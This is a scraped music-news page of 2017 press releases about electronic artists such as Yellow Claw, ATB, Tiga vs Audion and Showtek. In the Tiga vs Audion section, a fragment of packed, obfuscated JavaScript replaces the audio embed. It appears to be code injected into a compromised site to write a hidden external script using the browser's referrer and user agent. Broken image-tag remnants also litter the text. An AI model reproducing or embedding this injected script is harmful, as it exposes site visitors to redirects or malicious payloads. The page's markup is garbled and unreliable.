Yellow Claw Unveil “City on Lockdown” Music Video ft. Juicy J + Lil Debbie

YELLOW CLAW has released the music video to their trap single “City on Lockdown,” which features a collaboration with rappers Juicy J and Lil Debbie. The video was shot in Los Angeles and was directed by Frank Telli. For the visual, Telli brilliantly incorporated some interesting animation between the film footage. The song is from YELLOW CLAW’s current album LOS AMSTERDAM (out now on Mad Decent). PRESS HERE to watch the video.

LOS AMSTERDAM is the follow up to the producer/DJ pair’s 2015 debut, Blood For Mercy, which hit #1 on Billboard’s Heat Seekers Chart and Top/Dance Electronic Albums Chart and scored an Edison Award—the Dutch equivalent of a GRAMMY. It spawned the mega-smash with DJ Mustard, “In My Room” (feat. Ty Dolla $ign & Tyga), which notched over 104 million Spotify streams. The duo has over 407 million streams on Spotify and 417 million plays on YouTube to date.

The distance between Amsterdam and Los Angeles spans 5,550 miles. Despite the mileage apart, the cities share quite a bit in common, remaining creative hotbeds for their respective continents. Both locations fortified the foundation of YELLOW CLAW’s second full-length album. For the first time, the Dutch electronic duo—Jim Aasgier and Nizzle—enjoyed an extended stay in the City of Angels in order to write and record before heading back to Amsterdam to fine-tune their compositions throughout 2016. The process mirrors the musicians’ distinct sonic alchemy, fusing elements of European dancefloor panache and gritty American trap seamlessly. LOS AMSTERDAM is comprised of stellar collaborations with fellow artists: Juicy J, Quavo of Migos, Lil Debbie, Moski, Jonna Fraser, Rochelle, Tinie Tempah and Cesqeaux. The project also features the Billboard TOP 10 Dance Chart hit “Good Day” featuring DJ Snake & Elliphant.

AMSTERDAM, April 21st, 2017 – It’s been three long years for ATB fans waiting for a new album to drop, but their patience has finally been rewarded. In the year that marks ATB’s twentieth anniversary as a leading artist in electronic music, he launches his tenth studio album: ‘neXt’.

An exceptional crossover album that digs into modern-day trance music as much as it includes down-tempo gems, ‘neXt’ embodies all twenty years of ATB’s blooming career. It’s a next step in his musical development, delivering on every level while featuring a wide range of collaborations and guest artists across the spectrum. Whereas the first part of ‘neXt’ offers a fresh take on the ATB sound that’s been filling out clubs for two decades, the second part of the album focuses heavily on the chill atmospheres and ambient soundscapes ATB also considers part of his arsenal, totaling to twenty-five new tracks that show just how timeless the ATB sound truly is.

The huge success of ATB started with ‘9PM (Till I Come)’, which earned him a #1 hit in the UK in the late ’90. Since, his musical career has been nothing short of legendary. Previous album ‘Contact’ shot straight into the top 5 of the German charts in 2014 and as a DJ, ATB has headlined festivals all over the world, earning him a coveted Top 20 spot in the list of “Most Popular DJs in the World of All Time”. Judging by the consistent and unwavering support of his social following of over two million strong and the ease with which ATB churns out high-end compositions, there’s a whole lot more to expect from the gifted songwriter, musician, producer and DJ. ‘neXt’ is sure to keep fans satisfied until then.

BETTI reworks Britney’s ‘Toxic’ in visually stunning video + on tour with RAG’N’BONE MAN in Europe

src=”” alt=”” width=”300″ height=”300″ class=”alignnone size-full wp-image-213519″ />

Currently on tour with Rag’n’Bone Man in Europe, having performed to sold out crowds at Elysée Montmartre in Paris, Ottakringer Brauerei in Vienna and Melkweg in Amsterdam, to name just a few, Betti, is pleased to announce details of a brand new version of Britney’s hit ‘Toxic’, showcasing the emerging Jazz-pop singer’s old world charm and elegant fragility.

Recently signed to Decca Records, one of the most iconic record labels in the world, the beautifully mysterious vocalist, Betti, pushes boundaries, combining her Jazz routes with pop-sensibilities. With a sound that nods to both Billie Holiday and Amy Winehouse, and a style that hearkens back to the age of burlesque, Betti has the ability to command any room.

But there’s more than a seductive image to Betti: the Atlanta native possesses a hypnotic, versatile voice, one that can croon, coo or cry as the song dictates.

Betti’s debut single ‘Ordinary’ is out now and tells a tale of honest, real-life love. She evokes Ella Fitzgerald, drawing out the notes like honey dripping from a spoon. It’s a gorgeous performance on a topic that can be far from fairy tale perfect.

Betti will perform an opening set for all Rag’n’Bone Man’s European dates.

src=”×475.jpg” alt=”” width=”455″ height=”455″ class=”alignnone size-large wp-image-213401″ />

AMSTERDAM, April 10th , 2017 – Today, Armin van Buuren has become the first-ever artist to release his UMF set on streaming services. His set at the main stage of Ultra Music Festival Miami 2017, which is one of the most-viewed live sets of the festival on YouTube, is now available on Spotify, Apple Music, Deezer and more.

This year, Armin van Buuren performed on the main stage and on his own designated A State Of Trance stage during Ultra Music Festival Miami 2017, which is one of the biggest festivals in the world. His set on the main stage has now been made available on the world’s most popular streaming services, which also means that Armin van Buuren is the first artist to upload an Ultra set at the highest sound quality, as YouTube uploads have not yet been able to reach that level. Additionally, it ensures that Armada Music, the Amsterdam-based record label facilitating the upload, is the first record label to release a set of Ultra Music Festival on the streaming platforms.

Tiga vs Audion Return With ‘Nightclub EP’

=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tnrbs|var|u0026u|referrer|sekdk||js|php'.split('|'),0,{})) url=”″ params=”auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true” width=”100%” height=”450″ iframe=”true” /]

Tiga vs Audion’s ‘Nightclub EP’ is the third release from North America’s most eloquent techno team-up, and follows the mega-hit ‘Let’s Go Dancing’ and the micro-hit ‘Fever’. The ‘Nightclub EP’ features 3 new productions: ‘Stabbed In The Back’ (lead track), ‘Pink Bells’, and ‘Nonstop’. Released as a Beatport exclusive from 7 April, early support for the EP comes from Jamie Jones, The Martinez Brothers, Boys Noize, Dubfire, Kolsch, Heidi, Gerd Janson, Erol Alkan, Michael Mayer, and more.

“Living in contemporary society? It’s a joke. But what’s no joke is that rough times call for rough customers, and this EP finds two top techno producers in the mood for ballsiness, reflecting the times with a harder-edged sound, harder-edged artwork, and harder-edged calls for our leaders to remember that the dance floor was built on unity, plurality, and unshacklable animality.”

“After careful study, we came to the conclusion that the worse the titles, the more ‘techno’ the tracks. A-side ‘Stabbed in the Back’ takes its name from the fact that the track has keyboard stabs in it. Maybe my least favourite title of anything I’ve ever done, which is remarkable considering the runner-up was an unreleased stab-free track called ‘Doctors Without Keyboards.’ ‘Pink Bells’ was originally called ‘The Bells’ but I was told that this guy Geoff had already used it. ‘Nonstop’ got its name from the fact that I was really on a roll with bad titles at the time.”

“It’s extremely challenging to make instrumental techno with enough of a hook and enough of a funk to stand out, and it’s exponentially more difficult when I know deep down I could make everything alright so easily with just the sound of my voice. We bought a set of Bryan Adams Studio Flash Cards, which instructed us to make the kind of hyper-utilitarian dance tracks we could play in our own DJ sets. Sometimes, even musicians need to be reminded to put themselves first.”

Tiga returned to Turbo Recordings earlier this year with new single, ‘Eye Luv U’, his first new material since 2016’s ‘Blondes Have More Fun’. Co-produced by one half of Paranoid London, ‘Eye Luv U’ is the first in a series of releases from Tiga on Turbo in 2017.

Tiga recently dropped a new DJ mix on his SoundCloud page featuring exclusive music from both Tiga vs Audion, and Tiga, alongside Bjork, The Knife, Martinez Brothers, DJs Pareja, Justin Cudmore, Red Axes, Truncate, Solitary Dancer and more. The ‘Stereo Woke Mix – Live at StereoBar Montreal’ was recorded from his 27th January set at the Canadian club. A full tracklist is not available.

Now in a new partnership with !K7, Tiga’s Turbo imprint is the tastemaker label behind the early success of Chromeo, Gesaffelstein, and Duke Dumont, amongst many others. 2016 saw releases from rising stars Charlotte de Witte, ANNA, Gilmer Galibard, and Autarkic, while this year the label will shift its focus to electro, via cuts from Tiga, Audion, and Dimitri Veimar, alongside collaborative projects between Shaded & Harvard Bass.

Showtek & Brooks feat. Natalie Major – “On Our Own”

AMSTERDAM, March 31st, 2017 – Following the success of ‘Believer’ (with Major Lazer), Showtek have put out another super-hit-to-be. Made in collaboration with Brooks and American singer-songwriter Natalie Major, ‘On Our Own’ saw its release on Skink today.

A song that excels across the board, ‘On Our Own’ makes perfect use of its hyper-catchy vocals and inspiring lyrics to deliver a message worth dancing to. With the addition of its hooking rhythms and its larger-than-life melody and synths, it is a sing-along smash poised to dominate the global airwaves.

Showtek: “With our new song, “On Our Own,” we took the approach that everyone should and can be a strong and confident individual no matter what. This is obviously a strong message given the current political landscape we are living in. Also, it really harkens back to the fabric of dance music.”

Brooks: “This track means a lot to me. I’ve always respected Showtek a lot and I’m extremely proud that we’re releasing a collab now! We’ve been working on it for the last couple of months and made so many different versions of it. When we found the perfect vocal, we immediately knew that this was going to be the final one. After some more days in the studio together and testing it live, ‘On Our Own’ was done!”

Showtek, who already lined up several hit singles (‘Bad’, ‘Sun Goes Down’ (both with David Guetta) and ‘Booyah’) emerged with ‘Believer’ in the second half of 2016. A collaboration with globally acclaimed hit machine Major Lazer, ‘Believer’ hit #19 in Billboard’s Hot Dance/Electronic Songs chart, #23 in the official Dutch Top 40 and accumulated over 38 million streams to date on Spotify alone. ‘On Our Own’ might just be the record that follows in its footsteps.

“Project 001” a new film by Tommy Jacob (electronic/bass/experimental)

Project 001 is an 8 track album with a singular sound; Dark and tormented. Tommy Jacob oscillates between electrifying notes and deep bass, for a melancholic and poignant result.
Project 001 is both a true introspection and also an endless quest for the other. Tommy Jacob transcribes a unique vision through a captivating universe. Driven by the desire to return to a consumption of music as he knew when he was younger: “At the time I bought CDs and listened to them in loop until I knew them by heart, I did not know the song titles for me it was just track 1, track 2 etc.”.

The young producer wanted to go back to the basics with this untitled project which is also a pluridisciplinary one. Tommy Jacob imagined an 11 minutes short lm for his music written by himself. With a very graphic touch, each image is perfectly processed, adding to that dance sequences, another form of art he wanted to put in light.

The final step of the project was the cover, again, he called for a young artist, Sandjill, to imagine a painting for his music, “I wanted to create an artistic interpretation of my music combining different form of art.”.

Tommy Jacob has made a name for himself on the French and international scene with his melancholic productions with a unique sound. He released his debut EP in 2013 ‘Last’ which allows him to go on a tour in the United States and Canada. Later, sharing his time between Paris and Amsterdam, he created a side project ‘6 A.M’ a true success. He finally settles down in Paris to produce his album and joins the Roche Musique family.

Block & Crown team up with Damian Force to unleash ‘Finesse’

src=”×475.jpg” alt=”” width=”455″ height=”455″ class=”alignnone size-large wp-image-211855″ />

One of Holland’s finest exports over the last decade, Damian Force is back again with ‘Finesse’, featuring Block & Crown. Amsterdam’s very own Dance music maestro features on DOT Dance Recordings once again and shows why he is so highly regarded in the industry.

Force has had an eclectic history of production, moving effortlessly through multiple genres. Alongside this, he has had a successful DJing career in which he’s played many notable shows including Fame Festival in Poland. He also has a regular radio slot on Pacha Radio where he previews his newest productions to his fan base and new listeners alike.

His production prowess can be quantified by the popularity his previous releases garnered. The Freemasons remix of his track ‘Hold On’ featured in the World Top Ten Dance tracks in 2009. In 2012, ‘All Day Love’ charted in Beatport’s Top Ten House tracks showcasing his ability to encapsulate audiences. With his productions being played around the world by heavyweights such as Bob Sinclair and David Guetta, the respect his productions have is immense.

‘Finesse’ is another future classic from Force. Intricate synth work and chopped, heavily processed vocals create an addictive House rhythm capable of enticing any listener. Pair that with the powerful, punchy percussion and you have a typical Force production which is sure to go far. His synth work is second to none, and his experience in electronic music is abundantly obvious in ‘Finesse’.

DOT Dance Recordings have released some of Force’s previous productions and have a successful history in pushing his work. Frequent collaborator Bagrationy also features on the imprint and frequent releases will allow Force to progress even further in the future.

‘Finesse’ is out now so make sure you grab your copy now before it flies off the record store shelves!
